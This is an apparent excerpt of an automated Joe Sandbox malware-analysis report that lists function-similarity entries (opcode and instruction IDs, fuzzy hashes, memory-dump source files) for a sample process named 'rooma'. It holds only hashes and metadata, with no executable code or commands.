                                                            • Instruction ID: fb85fe095832ac08a465baebab75495ab4cba96992447acf10f48aea931d0bd8
                                                            • Opcode Fuzzy Hash: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                            • Instruction Fuzzy Hash: 83D1C071A006079BDB18EF69C890ABE77F5FF94308F544629E916EF290E734E950CB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5c35602b92d4b905d1f1117c5192853aca1efb720209436dd41711449a04516
                                                            • Instruction ID: d4e85b46f29520b6191a2e604ed146f065c76580345c86ef3597ebec80fc4fb1
                                                            • Opcode Fuzzy Hash: c5c35602b92d4b905d1f1117c5192853aca1efb720209436dd41711449a04516
                                                            • Instruction Fuzzy Hash: 47C1E371A412218BDB29CF2CC8947BDBBE1FF48714F99415BD9429F3A5E7308951CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: 5988b7d412e276c184cc3f547b391534933f4dfa8d8f6b3985983f7811b8dac2
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 92B1F431610646AFDB25DBA8C850BBFBBF6BF88304F540559E6569F381EB30E941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59cfb7162a9a13bb3982ba2e98b248736e2f2d2c9b910f1e466d8164d89226f4
                                                            • Instruction ID: 3ab8da4949996cb597d989f792869c5a2b5b683062ff50bd1c468919edacabca
                                                            • Opcode Fuzzy Hash: 59cfb7162a9a13bb3982ba2e98b248736e2f2d2c9b910f1e466d8164d89226f4
                                                            • Instruction Fuzzy Hash: 61A14F71950216AFEB22DFA8CC85FAE7BB9BF85754F014154FA00AF2A0D7759C10CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                            • Instruction ID: 997466e09dbd316a1c05eedd5188cd5cf72195dbc253d9a33c9960b417c7a065
                                                            • Opcode Fuzzy Hash: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                            • Instruction Fuzzy Hash: 14C15870108345DFD764CF19C494BAEBBE5BF88304F44492DEA898B291E774E908CF92
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                            • Instruction ID: a915ad3a8260706c1ee740c4da14b1311d581c41d5ddd0c5c5cf1c322ede678b
                                                            • Opcode Fuzzy Hash: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                            • Instruction Fuzzy Hash: 34B15F70A002668BDB64DF68C890BADB7F5BF84704F0485E9D54AAB291EB709D85CB31
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7462e9d1da3f7e3dc399ca7db54b211c2fc135a1dc4a1d63bf9ef97e94e9b98
                                                            • Instruction ID: 7bb8b61ad608cfa97956a5e6a5e80baf9b33d2f5081a95fc7f4cbee4d3494d1b
                                                            • Opcode Fuzzy Hash: e7462e9d1da3f7e3dc399ca7db54b211c2fc135a1dc4a1d63bf9ef97e94e9b98
                                                            • Instruction Fuzzy Hash: DAA12632E00659AFEB21DF98C885BEEBBA4FB01754F08011AEB51AF691D7749D40CBD1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                            • Instruction ID: 9eb3b467e5451931326c57747c8a4f6f21680dd06f31a85e91c1bc805d3f0cfd
                                                            • Opcode Fuzzy Hash: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                            • Instruction Fuzzy Hash: 22A1A070B016169BEB35DF6DC990BBEB7A5FF54318F004529EA499B2C2DB34E811CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                            • Instruction ID: a1e26bce7ff292a5555ecd5d4b62d3506767966d02f2a2a93c44558209bc88c2
                                                            • Opcode Fuzzy Hash: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                            • Instruction Fuzzy Hash: BEA1CB72A10252AFC721DF18CD80B6ABBE9FF88708F45462CE5899B750DB34EC51CB91
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b614e2d22daded9cad21b1ca526c67bd3f0c481b269ac366245fb5a1f6245f5
                                                            • Instruction ID: 302bc20eb6c49223ba306611f52dd4a34523d91cc2a2986f3060c1d42b55ee7c
                                                            • Opcode Fuzzy Hash: 4b614e2d22daded9cad21b1ca526c67bd3f0c481b269ac366245fb5a1f6245f5
                                                            • Instruction Fuzzy Hash: 13914531A40616CBEB24EB58D841B7DBBE1FF88718F454469EA459F280E734D941CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7534f935394fc424822b1c0cd527a64eccc0146e54ec3d8577d65f3058ec8dc
                                                            • Instruction ID: d6e9f4c982bfb223f01979889c63eb95991ea74978d44b24fd33d94e457cb02a
                                                            • Opcode Fuzzy Hash: d7534f935394fc424822b1c0cd527a64eccc0146e54ec3d8577d65f3058ec8dc
                                                            • Instruction Fuzzy Hash: A3B111B5A087419FD764CF28C480A5ABBF1BB88314F184A6EF999CB352D731E945CB42
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d4b0c26cad52f41d70bc2b32614004f0a43169933d18689c07f71f0cf107edb
                                                            • Instruction ID: c29e12459d15301b485cd82cb9d6fcccc10069033ebc4bdf4490f5722557a483
                                                            • Opcode Fuzzy Hash: 3d4b0c26cad52f41d70bc2b32614004f0a43169933d18689c07f71f0cf107edb
                                                            • Instruction Fuzzy Hash: 8AB159749002069FDF25CF2CD984BAEBBE0BF48358F24455DD9259F296EB31D842CB92
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                            • Instruction ID: b5c46f0d8b02601c1714adcfb8c05ccc6e5539262e11a6bf05ab25c488398a5e
                                                            • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                            • Instruction Fuzzy Hash: 07719035A0022A9BDF24CF68CCD0ABEBBFABF54750F59455AE901AB341E734D941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction ID: 07c806ad245c39fbba81277c26d64656b7f0e815cf6544414b01925090d310cf
                                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction Fuzzy Hash: 7E818D72E0111A8BDF14DF9CC882BEDBBB2FB84314F1A856EDA15BF354D63199408B91
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                            • Instruction ID: bd799331de9b62a0bc526b83589ed09ed91e66794dc877677520e231f9199130
                                                            • Opcode Fuzzy Hash: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                            • Instruction Fuzzy Hash: 36816F71900609AFDB25CFA8C881AEEBBFAFF88714F10442DE556AB250D730BC05CB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 994230561d0bdc61ee508da366580cbf0a2593b2b261258b05267b84ee35dcb9
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: E3715F71A0061AEFDB10DFA9C984EDEBBB9FF88704F144569E505EB250DB34EA41CB50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                            • Instruction ID: 4b17f2815647a83835ae111b0509bfc63029153139f7c36e0ba182a27de0be3e
                                                            • Opcode Fuzzy Hash: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                            • Instruction Fuzzy Hash: 24710432240B12AFE732CF18CC44F5ABBA6FF80714F148518EA968B2A0D770E945CF50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 191e52e115167db5980ab159134405e596d83c0f78608cff3a1ff0da75f1b2d1
                                                            • Instruction ID: cf9fc8eab4cb942b530c0907ff1029ec73118677b2a844641af498a70a1d92c4
                                                            • Opcode Fuzzy Hash: 191e52e115167db5980ab159134405e596d83c0f78608cff3a1ff0da75f1b2d1
                                                            • Instruction Fuzzy Hash: 78817075A00205DFCB09CF98C990AAEBBF1FF89304F1581A9D859EB355D734EA51CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 224cbac78f41b9fe164459cc51f4e551cf87d6d80ab3b61f516a656b0fa0fd3a
                                                            • Instruction ID: d6c1a6978e5473b14fb0e062a919c72ff7ab36db8159968c32a1efc30c750628
                                                            • Opcode Fuzzy Hash: 224cbac78f41b9fe164459cc51f4e551cf87d6d80ab3b61f516a656b0fa0fd3a
                                                            • Instruction Fuzzy Hash: 4F61AC71600716EBD7A5DF68CC84BABBBA9FB88758F00861DFC5987240DB30A511CB91
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89f313ab6e732509f4c54f96642a292898dbe6bb8d954b26151b3ca0350601b8
                                                            • Instruction ID: 695420f9874b09235b982953d4ccaa5e2b1b0e9fbb1de96b885d4874928d92ec
                                                            • Opcode Fuzzy Hash: 89f313ab6e732509f4c54f96642a292898dbe6bb8d954b26151b3ca0350601b8
                                                            • Instruction Fuzzy Hash: B461E131205742CBE351CF68CC94B6ABBE5BF90708F18446CED858B392EB35E806CB81
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f1789ab8aba142b97edfd0f5249747977e0aefc00a17c9080df485701ab6644
                                                            • Instruction ID: 43f42260fa549275bffa02976c0368ef9aece8bd2d8d58752fd9ed0e4d331346
                                                            • Opcode Fuzzy Hash: 9f1789ab8aba142b97edfd0f5249747977e0aefc00a17c9080df485701ab6644
                                                            • Instruction Fuzzy Hash: 1E41E531640602EFDB26AF6DDC81B2EBBA9FF84754F114429E95AEF351DB30D8018B90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3244b099d225b4ecac4519e6a74065b86c00ad409d395a5d3bc2b2ec54337641
                                                            • Instruction ID: d1f74f3039be94442388253a9d792ed6937c83e2c6b268d1478064d2df581483
                                                            • Opcode Fuzzy Hash: 3244b099d225b4ecac4519e6a74065b86c00ad409d395a5d3bc2b2ec54337641
                                                            • Instruction Fuzzy Hash: D1519FB1204242AFE735EF68CC91F6F77A8FB95764F10062DE9519B2D1DB34A801CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                            • Instruction ID: 022a77f8beed637395073ab44bcead779d4b3c3996abf930c1a171c3ed8cb4da
                                                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                            • Instruction Fuzzy Hash: D551E5762102539FCB1AAFE88C40A7B7BE6FFD4644F040529FA45C7291E735C856C7A2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3acf67b2eb5e96c5fe18684065c6858c2b8c4fe4bc98e25ee7c42fec3bdb14a0
                                                            • Instruction ID: 862a9ffceb9ea5d4758cc293a4ad5f819ab942a4d06117256d820c03e35cc540
                                                            • Opcode Fuzzy Hash: 3acf67b2eb5e96c5fe18684065c6858c2b8c4fe4bc98e25ee7c42fec3bdb14a0
                                                            • Instruction Fuzzy Hash: 8C519E7094020AAFEB219FA9CC81BEDBBB8FF45304F60452AE690AF151DB719844DF10
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a5198475338761eae32516f4f08cc7e740f5f93b9fc48e23282d618e81774d2
                                                            • Instruction ID: ac219182f16332b880a4fda76420ad26ecb892d6178fc558f88cf2b78acd35b4
                                                            • Opcode Fuzzy Hash: 2a5198475338761eae32516f4f08cc7e740f5f93b9fc48e23282d618e81774d2
                                                            • Instruction Fuzzy Hash: 0C510170A10A06EFEF15DF68C984BADBBF5BF58315F14406EE5069B290EB709901DF81
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                            • Instruction ID: 8489e331530b539fe31faea3f8c7b32cfb97b0121994c35e6853b11f924de3a2
                                                            • Opcode Fuzzy Hash: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                            • Instruction Fuzzy Hash: 52518A71640A06EFCB22EFA9CD90E6AB7FAFF54744F40086DE5458B261D730E940CB50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction ID: fb74f9d717c8394142bbc1ca9311fc99bc2323091e3b3ccb8c08b1765ecb87ec
                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction Fuzzy Hash: B2517171E0021AABDF25DF98C480BEEBBB5BF49754F044069EA02AF241E774DD45CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                            • Instruction ID: 64dd8651eae467efd3816188a7fa1e60ee045c1f8125fa92280e86af760fa825
                                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                            • Instruction Fuzzy Hash: 04513A716083429FD750CFA8C880B9ABBE5FFD8254F04892DF9949B381D734E946CB52
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51f9e2dc67f3a8b144b991d7208ffafceb1260c84b8f3eb781509627bed9e2d5
                                                            • Instruction ID: f4689076547f528227bdd0c4d8e8a21b30a048998d88290ece06841f3837014f
                                                            • Opcode Fuzzy Hash: 51f9e2dc67f3a8b144b991d7208ffafceb1260c84b8f3eb781509627bed9e2d5
                                                            • Instruction Fuzzy Hash: 28518E71A21216DFEF23DFA8C840BEDB7F5BB44714F14045AE505EF281E7B4A8608B62
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                            • Instruction ID: 8a39e613a1905c2f73c8d6363cd91732f2ec84cf8eaecc70f4d2b54847ad1fc6
                                                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                            • Instruction Fuzzy Hash: 95514C71640606EFDB16CF58C980A66BBB9FF45304F15C1AAE908DF362E371E946CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90b32db1fd02cd428fcf1f0a2efad224194c731861ecb4356ce6bacf5d8a5c8
                                                            • Instruction ID: 0565ac5cca1e0866c780f7b20c54ec1ddf67c3e444f633ae7386e76d9b1b0be6
                                                            • Opcode Fuzzy Hash: e90b32db1fd02cd428fcf1f0a2efad224194c731861ecb4356ce6bacf5d8a5c8
                                                            • Instruction Fuzzy Hash: FF412771650216AFDB3AEFA8DCD1B3F7BA4FB94B08F00512CE9029F241E77198208B50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                            • Instruction ID: 2c940082d8468f2f7b8beb955d044835a4d0be7c8e961434a925c685b587b3e8
                                                            • Opcode Fuzzy Hash: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                            • Instruction Fuzzy Hash: 27418C3A90021ADFDB15DFD8C440AEEB7B5BF98A10F14815EF915EB280D7359D41CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153f1ac29890762459571a76a67d93e38de7f0ce88f625e2b024736171ff7c4c
                                                            • Instruction ID: 2fe16e1a4f04a67a0a1e7b2009bdc358829d7cb3f28f5ba5577cd43815fabefd
                                                            • Opcode Fuzzy Hash: 153f1ac29890762459571a76a67d93e38de7f0ce88f625e2b024736171ff7c4c
                                                            • Instruction Fuzzy Hash: D0519C32204691CFEB22CA5CC444B2EB7F5BB84754F0905A9FA558F691EB28D840CBA2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                            • Instruction ID: 14a9839da57e6e2b6d15ec7902fe0e529bd69db6d276d1ba96d9425a9a2c8971
                                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                            • Instruction Fuzzy Hash: 69512971A00205DFDB19CFA8C9816AABBF1FF48314B14C66ED91997345E734EA81CF90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                            • Instruction ID: 3a9ae2ed893acd4f48c78bffe37d2d7280fa387b190e071a274bfdf9ad7cd18a
                                                            • Opcode Fuzzy Hash: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                            • Instruction Fuzzy Hash: 0F51E2B09402179FDF259B28CC00BADBBB1FF51314F0482A9E529AF2C2E7349985CF41
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 003534c4b0e0d1bf935f97f3d7df3588d9f0a33911af412f9d26c9cccfea8307
                                                            • Instruction ID: 1826eb20a9a2e767a0cb815cd20b13b596ae14055ba40d2061a9f841d90d6058
                                                            • Opcode Fuzzy Hash: 003534c4b0e0d1bf935f97f3d7df3588d9f0a33911af412f9d26c9cccfea8307
                                                            • Instruction Fuzzy Hash: DB419F71640603EFD726AFA8C884B2EBBE9FF94794F008469E516EF251D770D800CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
